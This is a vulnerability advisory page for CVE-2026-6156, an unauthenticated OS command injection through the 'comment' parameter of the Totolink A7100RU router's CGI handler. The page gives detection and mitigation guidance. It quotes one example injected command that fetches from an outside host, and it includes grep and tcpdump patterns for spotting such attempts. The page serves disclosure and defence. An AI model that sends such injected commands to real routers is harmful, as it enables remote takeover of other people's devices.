CVE-2026-6156
Received Received - Intake
OS Command Injection in Totolink A7100RU CGI Handler

Publication date: 2026-04-13

Last updated on: 2026-04-13

Assigner: VulDB

Description
A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setIpQosRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument Comment leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-13
Last Modified
2026-04-13
Generated
2026-06-16
AI Q&A
2026-04-13
EPSS Evaluated
2026-06-15
NVD
CVE-2026-6156
EUVD
EUVD-2026-21812
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-6156 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It occurs in the CGI script /cgi-bin/cstecgi.cgi, specifically in the function that processes the "comment" parameter.

The vulnerability arises because the "comment" parameter is passed to a function that inserts it into a buffer and then executes it as an operating system command. This allows an attacker to remotely inject and execute arbitrary OS commands on the router.

For example, an attacker can send a crafted POST request with the "comment" parameter containing a command like `wget 192.168.6.1:7777/testpoc`, which the router will execute, demonstrating remote code execution.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router without any authentication.

  • Attackers can take full control of the router, potentially altering its configuration or behavior.
  • They can use the router as a foothold to launch further attacks within the network.
  • Sensitive data passing through the router could be intercepted or manipulated.
  • The router could be used to distribute malware or participate in botnets.
Detection Guidance

This vulnerability can be detected by monitoring for suspicious POST requests to the /cgi-bin/cstecgi.cgi endpoint that include the "comment" parameter with unusual or command-like content.

A specific detection method involves checking for POST requests containing JSON data where the "comment" field includes command injection attempts such as commands starting with wget or other shell commands.

For example, you can use network monitoring tools or packet capture utilities like tcpdump or Wireshark to filter HTTP POST requests to /cgi-bin/cstecgi.cgi and inspect the payload for suspicious "comment" parameters.

  • tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep '/cgi-bin/cstecgi.cgi'
  • Use grep or similar tools on web server logs to search for POST requests with the "comment" parameter containing suspicious commands, e.g., grep 'comment=wget' access.log
Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable CGI endpoint /cgi-bin/cstecgi.cgi to trusted networks or IP addresses only.

Disabling or blocking POST requests to the setIpQosRules function or the entire CGI Handler component if not required can reduce the attack surface.

Applying any available firmware updates or patches from the vendor that address this vulnerability is strongly recommended.

Additionally, monitoring network traffic for exploitation attempts and implementing intrusion detection/prevention systems to block malicious payloads targeting the "comment" parameter can help mitigate risk.

Compliance Impact

The provided information does not specify how the CVE-2026-6156 vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-6156. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart